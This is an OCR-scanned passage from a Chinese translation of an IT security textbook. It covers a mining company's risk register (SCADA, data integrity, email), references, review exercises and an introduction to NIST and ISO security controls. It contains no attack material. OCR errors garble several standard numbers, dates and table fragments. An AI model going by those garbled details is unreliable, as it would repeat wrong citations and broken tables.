确定 了 关键 资产 清单 后 ， 分 析 员 需要 识别 对 这 些 关 键 资产 的 重要 威胁 并 确定 可 能 性 以 及 
后 果 的 值 。 对 SCADA 资产 的 主要 关注 点 是 源 自 外 部 对 结 点 的 非 授权 危害 。 这 些 系统 起 初 被 
设计 使 用 在 物理 隔离 且 可 信 的 网 络 上 ， 没 有 针对 现代 系统 的 外 部 攻击 强度 而 进行 强化 。 这 些 
系统 常常 运行 较 老 版 本 的 操作 系统 ， 具 有 众所周知 的 不 安全 性 。 许 多 这 样 的 系统 还 没有 被 打 


上 补丁 或 进行 升级 ， 运 行 的 关键 应 用 还 没有 升级 或 验证 能 够 运行 在 较 新 的 OS 版 本 上 。 最 近 ， 
SCADA 网 络 已 经 被 连接 到 公司 的 内 部 网 上 ， 这 样 能 提供 更 强大 的 管理 和 监控 能 力 。 由 于 意识 

















SCADA 结 点 和 网 络 
的 可 靠 性 和 完整 性 


储存 的 文件 和 数据 库 
信息 的 完整 性 
财务 系统 的 可 用 性 和 
完整 性 
采购 系统 的 可 用 性 和 
完整 性 
维护 /生产 系统 的 可 
用 性 和 完整 性 


邮件 服务 的 可 用 性 、 
完整 性 和 机 密 性 
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到 SCADA 结 点 很 可 能 是 不 安全 的 ， 这 些 连 接 通过 额外 的 防火 墙 和 代理 服务 系统 隔离 在 公司 的 
内 部 网 。 任 何 针 对 SCADA 结 点 的 外 部 攻击 必须 突破 公司 的 外 部 防火 墙 、SCADA 网 络 防火 墙 
和 代理 服务 器 。 这 需要 一 系列 的 安全 缺口 。 然 而 ， 通 过 对 各 种 计算 机 犯罪 的 调查 结果 均 显 示 源 
自 外 部 的 攻击 呈现 上 升 趋势 ， 且 存在 对 SCADA 网 络 攻击 的 案例 ， 分 析 员 据 此 得 出 以 下 结论 ， 
即使 一 个 攻击 发 生 的 可 能 性 很 小 ， 它 仍然 可 能 发 生 。 因 此 ， 我 们 选择 其 可 能 性 等 级 为 “ 极 不 可 
能 ” 。 分 析 员 与 矿业 工程 师 们 讨论 了 SCADA 网 络 遭 受 一 个 成 功 攻击 的 后 果 。 他 们 认为 控制 系 
统 受到 干扰 会 导致 严重 的 后 果 ， 因 为 它 影响 在 矿 中 工作 的 矿工 的 安全 。 通 风 、 大 面积 冷却 、 火 
灾 预 防 、 人 员 和 材料 吊 起 、 地 下 填充 系统 都 在 可 能 的 范围 之 内 ， 以 上 任何 一 项 受 损 都 将 导致 至 
命 事故 。 有 毒物 质 的 溢出 并 进入 附近 的 下 水 道 可 能 导致 环境 破坏 。 另 外 ， 对 财务 状况 的 影响 是 
很 大 的 ， 随 着 时 间 的 推移 ， 花 费 会 以 每 小 时 数 千 万 美元 计算 。 还 有 一 种 可 能 是 ， 如 果 银 星 矿 业 
被 发 现 违反 了 法 律 要 求 ， 那 么 其 执照 可 能 被 吊销 。 因 此 后 果 等 级 选 为 “严重 ” 。 最 终 风 险 等 级 
为 “高 ”。 

对 于 第 二 个 资产 ， 关 注 储存 信息 的 完整 性 。 分 析 员 注意 到 ， 在 近期 的 计算 机 犯罪 调查 中 ， 
有 大 量 的 未 授权 使 用 文件 系统 和 数据 库 的 报告 。 源 自 内 部 和 外 部 的 攻击 都 会 危及 这 些 资产 。 有 
些 可 能 是 恶意 破坏 或 欺诈 行为 ， 有 些 可 能 是 对 信息 的 无 意 删除 、 修 改 或 泄露 。 所 有 这 些 都 表明 
违背 数据 库 安全 的 事件 正在 增加 ， 而 且 这 些 数 据 资产 成 了 入 侵 者 的 主要 攻击 目标 。 这 些 系统 被 
设置 于 公司 的 内 部 网 上 ， 因 此 受到 公司 的 外 部 防火 墙 针 对 外 部 访问 的 保护 。 然 而 ， 如 果 防 火 墙 
被 攻破 或 攻击 者 使 用 已 控制 的 内 部 系统 获得 间接 的 访问 ， 是 有 可 能 威胁 到 数据 安全 的 。 关 于 内 
部 使 用 ， 公 司 对 在 数据 输入 和 操作 的 范围 上 做 了 规定 ， 特 别 是 那些 可 能 接受 审计 的 数据 。 公 司 
还 制定 了 服务 器 数据 备份 策略 。 然 而 ， 大 量 的 系统 ， 包 括 台式 机 和 服务 器 ， 被 用 来 创建 和 储存 
这 些 数据 ， 这 意味 着 这 一 策略 的 执行 情况 是 未 知 的 。 因 此 其 可 能 性 等 级 选 为 “可 能 ” 。 经 过 与 
公司 的 一 些 IT 经 理 讨论 ， 显 示 出 这 其 中 的 部 分 信息 是 机 密 的 ， 如 果 泄 露 给 他 人 的 话 ， 将 会 造 
成 财务 损害 。 同 时 可 能 需要 潜在 的 财力 花费 用 于 恢复 数据 或 其 他 由 安全 违背 引起 的 善后 工作 。 
如 果 个 人 信息 被 泄露 或 者 法 定 的 测试 结果 和 过 程 信息 丢失 ， 那 么 也 可 能 导致 严重 的 法 律 后 果 。 
因此 ， 后 果 等 级 选 为 “严重 ”。 最 终 风 险 等 级 为 “ 极 高 ”。 

关键 的 财务 、 采 购 和 维护 / 生产 系统 的 可 用 性 或 完整 性 ， 可 能 被 一 些 针 对 它们 使 用 的 操作 
系统 或 应 用 程序 的 攻击 所 损害 。 尽 管 在 公司 内 部 网 上 的 某 些 位 置 的 确 提 供 了 一 些 防护 ， 由 于 公 
司 结构 的 特点 ， 许 多 这 样 的 系统 没有 被 定期 地 打 补 丁 或 维护 。 这 意味 着 至 少 一 些 系统 ， 如 果 可 
以 访问 的 话 ， 在 面 对 一 系列 网 络 攻击 时 是 脆弱 的 。 公 司 外 部 防火 墙 拦截 攻击 的 任何 一 次 失败 ， 
都 很 可 能 导致 一 些 系统 被 自动 攻击 扫描 所 损害 。 其 发 生 的 速度 之 快 是 众所周知 的 ， 许 多 报告 显 
示 ， 未 打 补 丁 的 系统 在 网 络 连接 后 每 隔 不 到 15 分 钟 就 会 受到 一 次 攻击 。 因 此 ， 可 能 性 等 级 被 
指定 为 “可 能 ”。 与 管理 层 的 讨论 显示 ， 损 害 的 程度 与 攻击 的 范围 和 持续 时 间 成 正比 。 在 许多 
案例 中 ， 都 有 至 少 一 部 分 系统 需要 被 重建 ， 花 费 也 是 相当 可 观 的 。 伪 造 的 订单 发 往 供应 商 或 者 
不 能 发 订单 将 对 公司 的 名 誉 产生 消极 的 影响 ， 并 可 能 产生 混乱 ， 甚 至 可 能 造成 停产 。 无 法 处 理 
人 事 考勤 表 或 无 法 利用 电子 基金 转账 ， 以 及 未 授权 的 资金 转账 ， 也 将 影响 到 公司 的 名 誉 并 可 能 
产生 财务 损失 。 公 司 显示 维护 / 生产 系统 的 损坏 评价 应 当 稍 低 ， 由 于 工厂 具有 尽管 系统 受 损 而 
继续 运营 的 能 力 。 然 而 ， 它 对 高 效 的 运营 产生 的 影响 将 是 决定 性 的 。 后 果 等 级 分 别 选 为 “中 等 
和 “轻微 "， 最 终 风 险 等 级 分 别 为 “高 ”和 “中 ”。 

最 后 一 个 资产 是 邮件 服务 的 可 用 性 、 完 整 性 和 保密 性 。 没 有 有 效 的 电子 邮件 系统 ， 公 司 
的 运营 将 缺乏 效率 。 由 于 近年 来 邮件 蠕虫 泛滥 ， 许 多 组 织 出 现 过 邮件 系统 故障 。 通 过 电子 邮件 
传播 的 新 型 漏洞 利用 程序 已 被 多 次 报告 。 针 对 常见 程序 的 漏洞 利用 更 引起 了 关注 。 公 司 对 邮件 
系统 的 大 量 使 用 ， 包 括 员工 经 常 性 地 交换 和 打开 邮件 附件 ， 都 意味 着 受到 攻击 特别 是 针对 常 
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见 文件 类 型 的 o-day 攻击 的 可 能 性 是 非常 高 的 。 尽 管 公司 确实 在 它 的 因特网 网 关 过 滤 邮 件 ， 但 
o-day 攻击 未 被 捕获 的 可 能 性 也 是 很 高 的 。 针 对 邮件 网 关 的 拒绝 服务 攻击 是 非常 难以 防范 的 。 
因此 ， 在 识别 出 各 种 可 能 攻击 的 范围 很 广 以 及 攻击 很 快 就 发 生 的 概率 非常 高 的 情况 下 ， 选 择 可 
能 性 等 级 为 “几乎 必然 。 与 管理 层 的 讨论 表明 ， 尽 管 存在 其 他 可 能 的 通信 方式 ， 但 这 些 方式 
不 能 传输 电子 文件 。 通 过 采购 系统 下 订单 ， 必 须 具 有 获取 电子 报价 的 能 力 。 报 告 和 其 他 交流 通 
过 电子 邮件 定期 传送 ， 任 何 报告 不 能 发 送 或 不 能 接收 的 情况 都 可 能 影响 公司 的 名 誉 。 在 严重 的 
攻击 发 生 后 ,重建 电子 邮件 系统 需要 成 本 和 时 间 。 因 为 攻击 将 不 会 有 大 的 影响 ， 后 果 等 级 选 为 
“轻微 ”"。 最 终 风险 等 级 为 “高 ”。 

以 上 信息 被 总 结 后 呈送 给 管理 层 。 所 有 最 终 风 险 等 级 都 在 管理 层 指定 的 可 接受 的 最 小 等 
级 之 上 。 因 此 需要 进行 处 置 。 尽 管 上 面 列 出 的 第 二 个 资产 具有 最 高 的 风险 级 别 ， 但 管理 层 认 
为 SCADA 网 络 的 风险 是 不 可 接受 的 ， 因 为 它 存在 人 员 死 亡 的 可 能 性 ， 不 管 可 能 性 有 多 小 。 而 
且 ， 管 理 层 认 为 政府 监管 者 也 不 会 看 好 一 家 对 致命 威胁 不 予以 高 度 重视 的 公司 。 因 此 ， 管 理 层 
决定 指定 SCADA 的 风险 为 最 高 级 别 。 存 储 信息 完整 性 的 风险 放 在 第 二 位 。 管 理 层 还 决定 把 电 
子 邮件 系统 的 风险 放 在 最 后 一 位 ， 排 在 维护 /生产 系统 的 较 低 风险 之 后 ， 这 样 做 的 部 分 原因 是 
因为 电子 邮件 系统 受 损 将 不 会 影响 采矿 和 处 理 单元 的 产 出 ， 另 外 对 其 处 置 所 涉及 的 公司 邮件 网 
关 是 在 管理 层 控 制 之 外 的 。 

这 次 风险 评估 过 程 的 最 终结 果 是 总 体 风 险 注 册 表 ， 在 表 14-6 中 列 出 。 该 表 显示 了 已 识 
别 资 产 、 资 产 面临 的 威胁 以 及 赋予 的 等 级 和 优先 级 。 这 些 信息 继而 影响 对 适当 处 置 的 选择 。 
管理 层 决 定 对 前 5 个 风险 实施 适当 的 控制 措施 ， 以 减少 风险 发 生 的 可 能 性 和 造成 的 影响 。 下 
一 章 讨论 这 个 过 程 。 这 些 风 险 没 有 一 个 是 可 以 接受 或 规避 的 。 邮 件 系统 发 生 风险 的 责任 主要 
与 其 母 公 司 所 属 的 IT 集团 有 关 ， 该 集团 管理 外 部 邮件 网 关 。 因 此 应 当 与 IT 集团 共同 分 担 该 
风险 。 


14.6 ”推荐 读物 


[SLAY06] 提供 了 关于 IT 安全 管理 的 讨论 。 

[SCHN00] 提供 了 关于 现代 世界 中 的 IT 安全 问题 与 神话 的 可 读 性 很 强 的 综合 性 讨论 。 当 前 
IT 安全 管理 领域 的 最 佳 实践 已 被 整理 成 一 系列 国际 和 国家 标准 ， 并 鼓励 采用 这 些 标准 。 这 些 
标准 包括 [ISO27001]、[ISO27002]、[ISO27005]、[ISO31000]、[NIST95]、[NIST09]、[NIST12]、 
[NIST13]、[SASN06] 和 [SA04]。 


ISO13335 ISO/IEC, “ISO/IEC 13335-1:2004— Information technology 一 Security 
techniques 一 Management of information and communications technology 
security — Part 1: Concepts and models for information and communications 
technology security management,” 2004. 

ISO27001 ISO/IEC, “ISO/IEC 27001:2005—Information technology 一 Security 
Techniques- Information security management systems— Requirements,” 2005. 

ISO27002 ISO/IEC, “ISO/IEC 27002:2005—Information technology 一 Security 
Techniques 一 Code of practice for information security management,” 200S. 
Formerly known as ISO/IEC 17755:2005. 

18027005 ISO/IEC, “ISO/IEC 27005:2011—Information technology—Security 
Techniques — Information security risk management,” 2011. 

ISO31000 ISO, “ISO 31000:2009— Risk management— Principles and guidelines,” 2009. 

NIST95 National Institute of Standards and Technology, An Introduction to 
Computer Security: The NIST Handbook, Special Publication 800-12, 
October 1995. 
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NISTO9 National Institute of Standards and Technology, Recommended Security 
Controls for Federal Information Systems, Special Publication 800-53 
Revision 3, August 2009. 

NIST12 National Institute of Standards and Technology, Risk Management Guide 
for Information Technology Systems, Special Publication 800-30 Revision 1, 
September 2012. 

NIST13 National Institute of Standards and Technology, Guide to Industrial Control 
Systems (ICS) Security, Special Publication 800-82 Revision 1, April 2013. 

SA04 Standards Australia, “HB 231:2004— Information Security Risk Management 
Guidelines,” 2004. 

SASN06 Standards Australia and Standards New Zealand, “HB 167:2006—Security 
Risk Management,” 2006. 

SCHNO0 Schneier, B. Secrets & Lies—Digital Security in a Networked World, 
New York: John Wiley & Sons, 2000. 

SLAY06 Slay. J., and Koronios, A. Information Technology Security & Risk 
Management. Milton, QLD: John Wiley & Sons Australia, 2006. 


14.7 关键 术语 、 复 习题 和 习题 


关键 术语 

asset (资产 ) risk (风险 ) 

consequence (后 果 ) risk appetite (风险 偏好 ) 
control (控制 措施 ) risk assessment (风险 评估 ) 
IT security management (IT 安全 管理 ) risk register (风险 注册 表 ) 
level of risk (风险 等 级 ) i threat (威胁 ) 

likelihood (可 能 性 ) threat source (威胁 源 ) 
organizational security policy (组 织 安 全 方针 ) vulnerability (脆弱 性 ) 
复习 题 

14.1 给 出 IT 安全 管理 的 定义 。 

14.2 列 出 IT 安全 管理 试图 解决 的 三 个 基本 问题 。 

14.3 列 出 用 来 解决 三 个 基本 问题 的 过 程 的 步骤 。 

14.4 列 出 一 些 用 于 为 IT 安全 管理 和 风险 评估 提供 指导 的 重要 的 国际 和 国家 标准 。 
14.5 列 出 并 简要 定义 循环 进行 的 安全 管理 过 程 中 的 4 个 步骤 。 

14.6 组 织 的 安全 目标 决定 了 需要 什么 样 的 IT 安全 结果 ， 其 中 部 分 基于 信息 系统 在 组 织 中 的 角色 和 重要 


14.7 

14.8 

14.9 

14.10 
14.11 
14.12 
14.13 
14.14 
14.15 
14.16 


性 。 列 出 一 些 问题 来 帮助 阐明 以 上 观点 。 

列 出 并 简要 定义 识别 并 降低 IT 风险 的 4 种 方法 。 

在 识别 并 降低 IT 风险 的 4 种 方法 中 ，[ISO13335] 认为 哪 一 种 对 大 多 数组 织 来 说 成 本 效益 最 高 。 
列 出 详细 的 安全 风险 分 析 过 程 的 步骤 。 

给 出 资产 、 控 制 措施 、 威 胁 、 风 险 和 脆弱 性 的 定义 。 

指出 在 确定 每 一 个 关键 资产 、 被 损害 的 可 能 性 、 损 害 造 成 的 后 果 时 ， 谁 提供 了 关键 信息 ? 
说 明 帮 助 识别 资产 面临 的 威胁 与 风险 的 两 个 关键 问题 。 简 要 说 明 如 何 回答 这 两 个 问题 。 
给 出 后 果 和 可 能 性 的 定义 。 

确定 风险 的 简单 公式 是 什么 ? 为 什么 在 实践 中 通常 不 使 用 这 个 等 式 ? 

在 风险 注册 表 中 ， 对 于 已 识别 的 每 个 资产 / 威胁 需要 具体 说 明 那 些 项 ? 

列 出 并 简要 说 明 用 来 处 置 已 识别 风险 的 5 种 可 选 方案 。 
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习题 
14.1 


14.2 


14.3 


14.4 


14.5 


14.6 


14.7 


14.8 


研究 你 所 在 的 大 学 或 者 其 他 与 你 有 关系 的 组 织 所 使 用 的 IT 安全 方针 。 确 认 一 下 这 个 安全 策略 是 针 
对 14.2 节 中 所 列 出 的 哪 一 个 主题 的 。 如 果 可 能 ， 识 别 应 用 于 该 组 织 的 法 律 或 规章 要 求 。 你 认为 该 
方针 能 恰当 地 处 理 所 有 相关 的 问题 吗 ? 有 没有 一 些 问 题 ， 策 略 应 当 处 理 但 没有 处 理 ? 

在 一 个 只 有 有 限 IT 支持 的 小 型 会 计 事务 所 里 ， 作 为 对 桌面 系统 的 形式 化 风险 评估 的 一 部 分 ， 你 已 
经 识别 了 “桌面 系统 上 的 客户 和 财务 数据 文件 的 完整 性 ”资产 和 相应 的 “蠕虫 / 病毒 侵入 这 些 系 
统 导 致 这 些 文件 损坏 ”威胁 。 对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 注册 表 中 的 各 项 给 出 合理 的 值 ， 
并 说 明 你 的 选择 理由 。 

在 一 个 小 型 的 律师 事务 所 ， 作 为 对 主 文件 服务 器 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 了 “ 服 
务 器 上 的 会 计 记录 的 完整 性 ”资产 和 相应 的 威胁 “职员 通过 改变 会 计 记 录 来 隐瞒 财务 欺骗 的 行为 ” 。 
对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 注册 表 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 小 型 网 页 设计 公司 ， 作 为 对 外 部 服务 器 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 了 “组 织 
Web 服务 器 的 完整 性 ”资产 和 相应 的 威胁 “对 Web 服务 器 的 攻击 和 算 改 ”。 对 于 这 里 提 到 的 资产 
和 威胁 ， 对 风险 注册 表 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 IT 安全 顾问 公司 ， 作 为 对 主 文件 服务 器 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 了 “指导 
对 客户 的 渗透 测试 时 所 使 用 技术 的 保密 性 ， 储 存在 服务 器 上 的 测试 结果 的 保密 性 ”资产 和 相应 的 
威胁 “机 密 的 和 敏感 的 信息 被 外 部 或 内 部 人 员 窃取 / 泄露 ” 。 对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 
注册 表 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 大 型 政府 部 门 ， 作 为 对 职员 使 用 手提 式 电脑 情况 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 
了 “储存 在 手提 和 式 电脑 上 未 加 密 的 数据 库 副本 中 的 人 事 信息 的 保密 性 ”资产 和 相应 的 威胁 “通过 
盗窃 手提 式 电 脑 而 窃取 人 员 信 息 并 进而 盗用 身份 信息 ”。 对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 登记 
册 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 小 型 公共 服务 机 构 , 作 为 形式 化 风险 评估 过 程 的 一 部 分 ， 给 出 组 织 所 面临 的 一 些 威胁 。 使 
用 本 章 所 引用 的 各 种 风险 评估 标准 中 所 提供 的 核查 表 作 为 辅助 。 

NIST SP 800-30 的 2002 年 最 初版 本 的 副本 可 以 从 box.com/CompSec3e 获得 。 比 较 该 文件 中 说 明 可 
能 性 、 后 果 和 风险 等 级 的 表 3-4 BR 3-7 与 本 章 相 对 应 的 表 14-2 ER 14-4。 它 们 有 什么 主要 的 不 
E? 使 用 这 些 不 同 的 表 ， 对 风险 评估 的 细节 水 平 有 什么 影响 ? 你 认为 NIST 表格 在 最 新 版 本 中 有 显 
著 变化 吗 ? 1 
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IT 安全 控制 、 计 划 和 规程 





学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
© 列 出 各 种 不 同 种 类 和 类 型 的 有 效 的 控制 措施 ; 


概述 选择 恰当 的 控制 措施 来 处 置 风险 的 过 程 ; 
概述 针对 已 识别 风险 的 实施 方案 ; 
理解 实施 持续 的 后 续 安 全 保障 工作 的 必要 性 。 


在 第 14 章 中 , 我们 引入 了 IT 安全 管理 作为 一 个 形式 化 的 过 程 ， 以 此 确保 以 比较 经 济 的 方 
式 对 关键 资产 进行 充分 的 保护 ;随后 讨论 了 关键 的 风险 评估 过 程 。 本 章 将 继续 讨论 IT 安全 管理 。. 
我 们 将 研究 一 系列 能 够 用 于 改进 IT 系统 和 过 程 安全 的 管理 、 运 行 和 技术 方面 的 控制 措施 或 保 
障 措施 。 接 下 来 探讨 安全 计划 的 内 容 ， 其 中 详细 阐明 了 安全 计划 实现 的 过 程 。 然 后 实施 这 些 计 
划 ， 同 时 通过 培训 确保 所 有 人 员 能 够 清楚 各 自 的 职责 ， 
并 通过 监视 确保 安全 符合 性 。 最 后 ， 为 了 确保 能 够 达 
到 合适 的 安全 级 别 ， 管 理 层 必须 进一步 对 安全 控制 的 
有 效 性 进行 评价 ， 并 重复 整个 IT 安全 管理 过 程 。 





第 1 步 : 确定 风险 优先 级 
管理 评审 风险 注册 表 






15.1 IT 安全 管理 的 实施 第 2 步 :响应 风险 
我 们 在 第 14 章 中 介绍 了 IT 安全 管理 的 过 程 ， 如 确定 风险 响应 方式 

图 14-1 所 示 。 第 14 章 主要 讨论 安全 管理 过 程 的 前 期 阶 (RE. RB BE. IE 

段 ， 本 章 则 侧重 于 安全 管理 的 后 期 阶段 ， 包 括 选 择 安全 

控制 措施 、 开 发 实施 计划 以 及 对 计划 实施 的 后 续 监 管 等 。 

我 们 基本 上 遵循 了 文献 [INIST11] 所 提供 的 指南 ， 该 指南 


是 由 NIST 依据 FISMA 开发 的 ， 它 对 信息 安全 风险 管 
理 提供 了 一 个 集成 的 、 组 织 机 构 范围 的 实施 程序 ， 是 一 
份 旗舰 式 的 文件 。 图 15-1 对 这 些 安全 管理 的 实施 步 又 


进行 了 概要 性 的 总 结 。 下 面 我 们 将 依次 讨论 这 些 内 容 。 
15.2 ”安全 控制 或 保障 措施 


对 一 个 组 织 的 信息 系统 进行 风险 评估 首先 应 该 识 


别 出 需 要 处 置 的 领域 。 下 一 个 步 又 就 是 选择 合适 的 风 BIS) 安全 乱 理 控制 措施 与 实施 过 各 
险 分 析 方法 ， 也 就 是 选择 用 于 风险 处 置 的 合适 的 安全 控制 措施 ， 如 图 14-1 所 示 。IT 安全 控制 措 
施 (control)、 保 障 措施 〈safeguard) 或 对 策 (countermeasure) (这 些 术 语 可 以 互 换 使 用 ) 可 以 
用 于 降低 风险 。 关 于 控制 措施 ， 我 们 采用 以 下 定义 : 


控制 措施 : 通过 一 些 方法 减少 风险 的 措施 、 设 备 、 规 程 或 其 他 举措 ， 这 些 方法 包括 : 消除 或 


预防 安全 违规 现象 ; 将 安全 违规 造成 的 损害 减 到 最 小 ; 或 者 发 现 并 报告 安全 违规 现象 进而 启 
动 纠 正 措施 。 
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一 些 安 全 控制 措施 能 够 同时 处 理 多 个 风险 ， 选 择 这 样 的 控制 措施 是 非常 合算 的 。 控 制 措施 


可 以 分 为 以 下 几 类 (尽管 有 些 控制 措施 同时 包含 了 其 中 几 类 的 特征 ): 


e 管理 控制 措施 (management control): 主要 是 安全 策略 、 计 划 、 指 南 和 标准 ， 这 些 都 会 
对 选择 降低 风险 损失 、 保 护 组 织 任务 的 操作 和 技术 控制 产生 影响 。 这 些 安全 控制 措施 
指出 了 管理 层 需要 解决 的 一 些 问题 。 我 们 在 第 14 章 和 第 15 章 中 讨论 了 大 量 这 方面 的 
控制 手段 。 

© 运行 控制 措施 (operational control): 主要 是 解决 安全 策略 和 标准 的 正确 实施 和 使 用 问 
题 ， 确 保安 全 操作 的 一 致 性 并 纠正 已 识别 的 运行 缺陷 。 这 些 控制 措施 涉及 主要 由 人 而 
不 是 由 系统 实施 的 机 制 和 规程 ， 它 们 是 用 来 改善 一 个 或 一 组 系统 的 安全 状况 的 。 我 们 
将 在 第 16 章 和 第 17 章 讨论 部 分 这 方面 的 控制 方法 。 

o 技术 控制 措施 (technical control): 涉及 对 系统 硬件 和 软件 安全 能 力 的 正确 使 用 。 这 些 
从 简单 到 复杂 的 措施 协同 工作 ， 可 确保 关键 和 敏感 的 数据 、 信 息 和 1IT 系统 功能 的 安 
全 。 图 15-2 列举 了 一 些 典型 的 技术 控制 措施 。 本 书 的 第 一 部 分 和 第 二 部 分 也 讨论 了 这 
方面 的 控制 措施 。 

以 上 每 一 类 控制 措施 都 可 以 依次 包含 如 下 不 同类 型 的 措施 . 

e 支持 性 控制 措施 (supportive control): 是 指 与 其 他 控制 措施 相关 联 的 或 者 被 其 他 控制 措 
施 采 用 的 普 适 的 、 通 用 的 、 基 础 性 的 技术 方面 的 IT 安全 能 力 。 

e 预防 性 控制 措施 (preventative control): 主要 通过 阻止 企图 违反 安全 策略 或 利用 脆弱 性 
的 行为 来 预防 安全 违规 事件 的 发 生 。 

© 检测 和 恢复 控制 措施 (detection and recovery control): 主要 通过 以 下 方式 对 安全 违规 做 
出 响应 ;对 违反 或 试图 违反 安全 策略 或 者 已 识别 的 脆弱 性 利用 的 行为 进行 警告 ， 提 供 
恰当 的 恢复 因 上 述 行为 而 损失 的 计算 资源 的 方法 。 

在 图 15-2 中 列 出 的 技术 控制 措施 包括 了 上 述 每 一 种 类 型 控制 措施 的 实例 。 


受 保护 的 通信 
(通过 阻止 泄露 、 蔡 代 、 修 改 和 重 放 攻 击 来 达到 的 安全 ) 


识别 
密 钥 管理 
安全 管理 


系统 保 # 


È 
(最 小 特权 、 客 体重 用 、 进 程 隔离 等 ) 
图 15-2 技术 安全 控制 
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很 多 国家 标准 和 国际 标准 都 提供 了 安全 控制 列表 ， 这 些 标准 包括 [ISO27002]. [ISO13335] 
和 [NIST09]。 这 些 标准 中 应 该 采用 的 控制 类 型 和 上 典型 控制 的 详细 清单 等 方面 大 致 相同 。 事 实 
上 ， 这 些 标 准 之 间 的 交叉 引用 就 表明 它们 在 形成 这 些 列表 的 过 程 中 所 遵循 的 原则 是 一 致 的 。 
[ISO27002] 通常 被 认为 是 控制 措施 的 总 清单 ， 因 而 它 被 其 他 标准 引用 得 也 是 最 多 的 。 表 15-1 
(改编 自 [NIST09] 的 表 1-1) 列 出 了 每 一 类 控制 措施 中 的 典型 控制 族 ， 与 表 15-2 详细 描述 的 
[ISO27002] 中 的 控制 类 型 相 比较 ， 就 会 发 现 它们 之 间 有 着 高 度 的 重 符 。 这 些 控制 类 中 的 每 一 类 
都 有 一 份 很 长 的 具体 的 控制 列表 可 供 选 择 。 表 15-3 (改编 自 [NIST09] 附录 D 中 的 表 ) 列 出 了 
这 个 标准 中 的 所 有 安全 控制 措施 。 

为 了 达到 一 个 合适 的 安全 级 别 ， 有 时 候 我 们 应 当 把 这 些 控制 措施 结合 起 来 。 如 果 正 在 
使 用 基线 方法 ， 那 么 我 们 也 应 当 在 政府 或 者 相关 行业 的 标准 中 规定 一 组 合适 的 控制 措施 的 基 
线 。 例 如 ，[NIST09] 的 附录 D 中 分 别 列 出 了 在 低 、 中 、 高 影响 的 信息 系统 中 可 用 的 基线 控 
制 措施 的 选择 项 。 控 制 措施 的 选择 应 当 考 虑 到 公司 的 总 体 风 险 状况 以 及 资源 和 能 力 。 这 些 控 
制 措施 应 当 在 组 织 的 所 有 信息 系统 中 实施 ， 并 且 根 据 具 体系 统 的 不 同 要 求 ， 可 在 一 定 范围 内 
加 以 调整 。 


表 15-1 NIST SP800-53 安全 控制 措施 


fa FERE 
管理 运行 物理 和 环境 保护 
管理 运行 系统 和 信息 完整 性 
表 15-2 ISO/IEC 27002 的 安全 控制 
控 制 类 目 标 
安全 方针 依据 业务 要 求 和 相关 法 律 法 规 提供 管理 指导 并 支持 信息 安全 
ch ”建立 管理 框架 ， 以 启动 和 控制 组 织 范 围 内 的 信息 安全 实施 和 运行 ， 确 保 远程 办 公 和 移 
动 设备 使 用 的 安全 
确保 员工 和 承包 方 人 员 理 解 其 职责 ， 考 虑 其 承担 的 角色 是 适合 的 ;确保 员工 与 承包 广 
人 力 资源 安全 人 员 意 识 到 并 完成 他 们 的 信息 安全 间 任 ， 作 为 变更 或 终止 任用 过 各 的 一 部 分 ， 保 护 组 
We 识别 组 织 资产 并 确定 适当 的 保护 责任 ; 确保 信息 按照 其 对 组 织 的 重要 性 受到 恰当 等 级 
的 保护 ， 防 止 存储 在 介质 中 的 信息 唱 受 未 授权 泄露、 修改 、 清 除 或 销毁 
sips ei 限制 对 信息 与 信息 处 理 设施 的 访问 ; 确保 授权 用 户 访问 系统 和 服务 并 防止 未 授权 的 访 
间 ; 让 用 户 负责 保护 他 们 自己 的 授权 信息 ; 防止 对 系统 和 应 用 的 未 授权 访问 
密码 技术 确保 正确 和 有 效 地 使 用 密码 技术 ， 保 护 信息 的 机 密 性 、 真 实 性 和 完整 性 
Dn 防止 对 组 织 信息 和 信息 处 理 设施 未 授权 的 物理 访问 、 损 坏 和 干扰 ;防止 资产 的 丢失 、 


损坏 、 失 窃 或 危及 资产 安全 并 中 断 组 织 的 运行 
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( 续 ) 
控 制 类 E 标 
操作 安全 确保 正确 安全 的 操作 信息 处 理 设施 ;确保 信息 与 信息 处 理 设施 ， 防 范 恶意 软件 ， 防 止 
数据 损失 ;记录 事件 并 产生 证 据 ; 确保 运行 系统 的 完整 性 ， 防 止 利用 技术 脆弱 性 
通信 安全 确保 网 络 中 信息 及 其 支持 性 信息 处 理 设施 的 保护 ; 确保 组 织 内 部 和 所 有 外 部 实体 信息 


转移 的 安全 


确保 信息 安全 是 贯穿 信息 系统 生命 周期 的 有 机 组 成 部 分 ， 这 还 包括 通过 公 网 提供 服务 
系统 获取 、 开 发 和 维护 | 的 信息 系统 的 安全 要 求 ; 确保 信息 安全 被 设计 和 应 用 在 信息 系统 整个 生命 周期 中 ; 确保 


测试 用 数据 的 保护 
供应 商 关 系 维持 与 供应 商 协 议 一 致 的 约定 的 信息 安全 与 服务 交付 的 水 平 
信息 安全 事件 管理 确保 一 个 一 致 和 有 效 的 方法 管理 信息 安全 事件 ， 其 中 包括 安全 事态 和 弱点 的 沟通 
信息 安全 连续 性 应 被 檬 入 到 组 织 的 业务 连续 性 管理 体系 中 去 ; 确保 信息 处 理 设施 的 可 用 性 
符合 性 避免 违反 任何 信息 安全 相关 法 律 、 法 令 、 法 规 或 合同 义务 以 及 任何 安全 要 求 ; 确保 信 


息 安全 的 实施 和 操作 符合 组 织 的 策略 和 规程 


表 15-3 NIST SP800-53 的 详细 安全 控制 


访问 控制 


访问 控制 策略 与 规程 ， 账 户 管理 ， 访 问 强制 ， 信 息 流 强 制 ， 职 责 分 离 ， 最 小 特权 ,失败 登录 次 数 ， 系 统 使 用 通 
